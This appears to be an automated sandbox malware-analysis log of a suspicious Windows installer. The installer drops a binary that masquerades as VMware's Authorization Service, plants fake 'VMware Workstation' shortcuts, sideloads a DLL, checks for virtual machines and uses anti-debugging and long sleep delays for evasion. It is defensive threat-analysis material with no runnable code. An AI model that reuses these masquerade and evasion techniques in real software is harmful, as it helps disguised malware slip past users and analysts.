          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeAPI coverage: 1.5 %
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7208Thread sleep count: 1793 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7212Thread sleep count: 1301 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 4040Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF93AFA FindFirstFileExW,4_2_6CF93AFA
          Source: C:\Windows\System32\rundll32.exeCode function: 13_2_00415080 FindFirstFileW,FindClose,13_2_00415080
          Source: C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exeCode function: 0_2_000E9ED6 VirtualQuery,GetSystemInfo,0_2_000E9ED6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_VMCI
          Source: FilePost?a.exe.3.drBinary or memory string: CompanyNameVMware, Inc.b
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LIB/NET48/VMWAREBASE.DLL
          Source: FilePost?a.exeBinary or memory string: \\.\pipe\vmware-authdpipe
          Source: FilePost?a.exe.3.drBinary or memory string: http://www.vmware.com/0
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetWriteAccess
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstation.lnk
          Source: FilePost?a.exe.3.drBinary or memory string: name="VMware.VMware.vmauthd"
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware-authd.exep^!
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetNumaNode
          Source: FilePost?a.exe.3.drBinary or memory string: PANIC: %s599 vmware-authd PANIC: %s
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: Rlib/net48/vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetTags
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSPurge
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnkx.%
          Source: FilePost?a.exe.3.drBinary or memory string: 17.0.0 build-20800274VMware Workstation%s Authentication Daemon Version %u.%u for %s %s
          Source: FilePost?a.exe.3.drBinary or memory string: noreply@vmware.com0
          Source: FilePost?a.exe.3.drBinary or memory string: vmware
          Source: Update.exe, 00000003.00000002.2059737003.00000000007DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk,
          Source: FilePost?a.exe, 00000008.00000002.3857077776.00000000005CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLB}
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_VMCISetFiltering
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSPurge
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryHGFS
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\Post
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: VMware Authorization Service
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstationp^!
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetWriteAccess
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Authorization Servicep^!
          Source: FilePost?a.exe.3.drBinary or memory string: Authorization and authentication service for starting and accessing virtual machinesVMware Authorization ServiceVMAuthdServiceSuccessfully registered %s.
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DCan't write shortcut: C:\Users\user\Desktop\VMware Workstation.lnkx.%
          Source: rundll32.exe, 0000000D.00000002.3859934007.000001D5874C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .C:\Users\user\Desktop\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.3.drBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostDefaultCase
          Source: FilePost?a.exe, 00000004.00000002.3857637644.00000000030E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.b
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-hostd
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetFollowSymlinks
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostPath
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_HGFS
          Source: Squirrel-Install.log.3.drBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Squirrel-Install.log.3.drBinary or memory string: [07/03/24 10:47:20] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .C:\Users\user\Desktop\VMware Workstation.lnkx.%
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx-debug.exe
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk2!
          Source: FilePost?a.exe.3.drBinary or memory string: File_CreateDirectoryvmwarebase.DLL)_strdup
          Source: FilePost?a.exe.3.drBinary or memory string: security.host.ruisslvmwareauthd.policy.allowRCForReadvmauthd.startupTimeoutgetpeername failed: %d tid %d
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetFiltering
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPresent
          Source: Squirrel-Install.log.3.drBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk
          Source: FilePost?a.exe.3.drBinary or memory string: \\.\pipe\vmware-authdpipeCreateNamedPipe failed: %s (%d)
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetEnabled
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx.exe
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AC:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll@
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostDefaultCase
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn:
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetReadAccess
          Source: FilePost?a.exe.3.drBinary or memory string: VMware
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.
          Source: Main.dll.8.drBinary or memory string: \VMware Workstation.lnk
          Source: FilePost?a.exe.3.drBinary or memory string: <description>"VMware Authorization Service"</description>
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetGuestName
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx.exe%s%c..%c%svmware-vmx-debug.exevmware-vmx-stats.exeNo ticket found
          Source: FilePost?a.exe.3.drBinary or memory string: VMware, Inc.1!0
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Can't write shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnkx.%
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Squirrel-Install.log.3.drBinary or memory string: [07/03/24 10:47:20] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_VMCI
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVMwareGroupSid
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: FilePost?a.exe.3.drBinary or memory string: VMware, Inc.1
          Source: FilePost?a.exe.3.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb--
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\user\Desktop\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: vmwarebase.DLL
          Source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_GetSize
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetExpiration
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AC:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /LIB/NET48/VMWAREBASE.DLL
          Source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Do
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: iC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetReadAccess
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ListenVMCI
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1998-2022 VMware, Inc.p^!
          Source: FilePost?a.exe.3.drBinary or memory string: VMware Server Console
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ConnectVMCI
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: VMware Workstation
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetEnabled
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib/net48/vmwarebase.dll0y
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetPresent
          Source: FilePost?a.exe.3.drBinary or memory string: OriginalFilenamevmware-authd.exeF
          Source: FilePost?a.exe.3.drBinary or memory string: : SSL RequiredNFCSSL supported/tServerDaemonProtocol:SOAPVMware%s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s%sError retrieving thumbprintInvalid arguments to '%s%s'Login failed: token key authentication not allowed.GET TOKEN KEY failed: got %s
          Source: Update.exe, 00000003.00000002.2062184970.000000001B8C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\VMware Workstation.lnkDb
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk2!
          Source: FilePost?a.exeBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostPath
          Source: FilePost?a.exe.3.drBinary or memory string: http://www.vmware.com/0/
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetFollowSymlinks
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetID
          Source: FilePost?a.exe.3.drBinary or memory string: nfcnfcsslvmware-hostdPROXY service %s not found.USER too long.Password required for %s.Login with USER first.InSeCuRePassword not understood.User %s logged in.LOGIN FAILURE from %.128s, %s
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetUnrestricted
          Source: FilePost?a.exe, 00000004.00000002.3857637644.00000000030BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLfYZ
          Source: FilePost?a.exe.3.drBinary or memory string: ProductNameVMware WorkstationP
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.p^!
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_HGFS
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib\net48\vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.3.drBinary or memory string: FileDescriptionVMware Authorization ServiceL
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetGuestName
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryVMCI
          Source: FilePost?a.exe.3.drBinary or memory string: 1998-2022 VMware, Inc.J
          Source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Undo
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncX
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx-stats.exe
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetTags
          Source: FilePost?a.exe, 00000004.00000002.3857637644.00000000030DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_x
          Source: FilePost?a.exe.3.drBinary or memory string: User not authorized for vpx agent contactvmware-vpxaUser not authorized for vmx contactConnecting socket=%s
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPciSlotNumber
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: Invalid pathname (too long)Config file not found: %sVMware Server ConsoleYou need read access in order to connect with the %s. Access denied for config file: %sYou need execute access in order to connect with the %s. Access denied for config file: %s%s-fdConnect %sError connecting to %s service instance.Can't create mutex '%s' (%d)Timeout acquiring thread lock.-fdCould not open %s process %d. (error %d)Error connecting to vmx process.No such %s process: %s
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetExpiration
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVmwareCommonAppDataFilePath
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetPresent
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vpxa
          Source: FilePost?a.exe.3.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED8F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00ED8F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF937F3 mov eax, dword ptr fs:[00000030h]4_2_6CF937F3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF89141 mov eax, dword ptr fs:[00000030h]4_2_6CF89141
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF9494E GetProcessHeap,4_2_6CF9494E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED90E3 SetUnhandledExceptionFilter,4_2_00ED90E3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED84CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00ED84CB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_00ED8F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00ED8F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF7855E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6CF7855E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 4_2_6CF8300E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6CF8300E
